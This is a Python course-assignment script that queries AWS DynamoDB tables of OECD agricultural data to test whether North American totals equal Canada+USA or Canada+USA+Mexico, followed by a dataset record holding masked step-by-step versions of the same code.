print(f"Variable: {variable_encodings_dict[variable]}")
print(OUTPUT_FORMAT.format("Year", "North America", "Canada", "USA", "Mexico", "CAN+USA", "CAN+USA+MEX", "NA Defn"))
# Retrieve all data, from all years (ie. the items from the scan)
na_scan_data = na_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
can_scan_data = canada_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
usa_scan_data = usa_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
mex_scan_data = mexico_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
# Sort each scan data by key
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
# Analyze data
for year in YEAR_RANGE:
# For each relevant year, calculate total value using multiplication factor
i = year - 2010
na_value = na_scan_data[i]['value'] * (10**na_scan_data[i]['mfactor'])
can_value = can_scan_data[i]['value'] * (10**can_scan_data[i]['mfactor'])
usa_value = usa_scan_data[i]['value'] * (10**usa_scan_data[i]['mfactor'])
mex_value = mex_scan_data[i]['value'] * (10**mex_scan_data[i]['mfactor'])
# Calc temp sums for the CAN+USA and CAN+USA+MEX columns
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
# Determine OECD def of NA, by checking if the temp calc sums from scan data calc values are equivalent to CAN+USA sum, CAN+USA+MEX sum, or Neither
# Note: accumulate the #of accurate NA def 'hits'
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
# Print table row for current year
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value, mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
# Determine the NA definition for this variable based on #of 'hits' per year
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = "CAN+USA"
elif temp_can_usa_mex == max_hits:
na_defn = "CAN+USA+MEX"
else:
na_defn = "Neither"
print(f"North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither")
print(f"Therefore we can conclude North America = {na_defn}\n")
# Accumulate global totals using temp local accumulators for NA definition 'hits'
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
def data_sort(elem):
    """Key function for ordering queried scan items chronologically.

    Each DynamoDB scan item is a dict carrying a 'year' attribute; returning
    it lets ``list.sort(key=data_sort)`` line the rows up by year.
    """
    year = elem['year']
    return year
###################################################################################################
main()
|
flexible
|
{
"blob_id": "05186093820dffd047b0e7b5a69eb33f94f78b80",
"index": 6787,
"step-1": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n 
print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\n<mask token>\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = 
canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n 
print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: 
{variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n 
print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n 
print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: 
{variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n 
print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\nmain()\n",
"step-4": "<mask token>\nimport boto3\nimport csv\nimport sys\nfrom boto3.dynamodb.conditions import Key, Attr\nNORTH_AMERICA = 'northamerica'\nCANADA = 'canada'\nUSA = 'usa'\nMEXICO = 'mexico'\nTABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]\nYEAR_RANGE = range(2010, 2030)\nOUTPUT_FORMAT = '{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}'\nENCODINGS_CSV = 'encodings.csv'\nUSAGE_STATEMENT = 'Usage: py queryOECD.py <commodity-code|commodity-label>'\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n 
variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef 
has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n 
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\nmain()\n",
"step-5": "#!/usr/bin/env python\n\n'''\n@author : Mitchell Van Braeckel\n@id : 1002297\n@date : 10/10/2020\n@version : python 3.8-32 / python 3.8.5\n@course : CIS*4010 Cloud Computing\n@brief : A1 Part 2 - AWS DynamoDB ; Q2 - Query OECD\n\n@note :\n Description: There are many CSV files containing info from the OECD about agricultural production, each for various regions around the world.\n Queries all 4 tables (northamerica, canada, usa, mexico -table names) based on a commodity (code key or label),\n looking for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,\n then output the specific NA definition 'hit' results and probable conclusion for NA definition per variable,\n as well as an overall conclusion for NA definition\n\n NOTE: forgot to add ability to specify commodity as cmd line arg instead of STDIN\n\n NOTE: assume year range is 2010 to 2029 (inclusive)\n NOTE: assume perfect user input for commodity and variables\n - however, if input commodity that's not a valid commodity code or label, exits program with error message\n NOTE: NA definition hit refers to if the calculated sum from different tables of CAN, USA, MEX are equal to that of NA (CAN+USA, CAN+USA+MEX, or Neither)\n'''\n\n'''\n IMPROVEMENT: Use 'encodings' table instead of the CSV file\n'''\n\n############################################# IMPORTS #############################################\n\n# IMPORTS - 'pip install <import-package>'\nimport boto3\nimport csv\nimport sys\nfrom boto3.dynamodb.conditions import Key, Attr\n\n############################################ CONSTANTS ############################################\n\n# TABLE CONSTANTS\nNORTH_AMERICA = \"northamerica\"\nCANADA = \"canada\"\nUSA = \"usa\"\nMEXICO = \"mexico\"\nTABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]\nYEAR_RANGE = range(2010, 2030)\n\n# OTHER CONSTANTS\nOUTPUT_FORMAT = \"{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}\"\nENCODINGS_CSV = 
\"encodings.csv\"\n#ENCODINGS_TABLE_NAME = \"encodings\"\nUSAGE_STATEMENT = \"Usage: py queryOECD.py <commodity-code|commodity-label>\"\n\n############################## STATE VARIABLES, INITIALIZATION, MAIN ##############################\n\n# MAIN - Declares global vars and state here, then ask for commodity (check both key/label),\n# look for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,\n# then output the specific NA definition 'hit' results and probable conclusion for NA definition\ndef main():\n #globals\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n\n # ========== ARGUMENTS ==========\n\n # Collect command line arguments when executing this python script\n argc = len(sys.argv)\n bad_usage_flag = False\n \n # Check #of args (deal with it later tho)\n # 1 optional arg for commodity, otherwise prompt user for it\n if argc > 2:\n bad_usage_flag = True\n print(\"Error: Too many arguments.\")\n \n # Exit with usage statement if flag has been triggered for any reason\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n\n # ========== AWS DYNAMO DB ==========\n\n # Init AWS DynamoDB client and resource (NOTE: these are 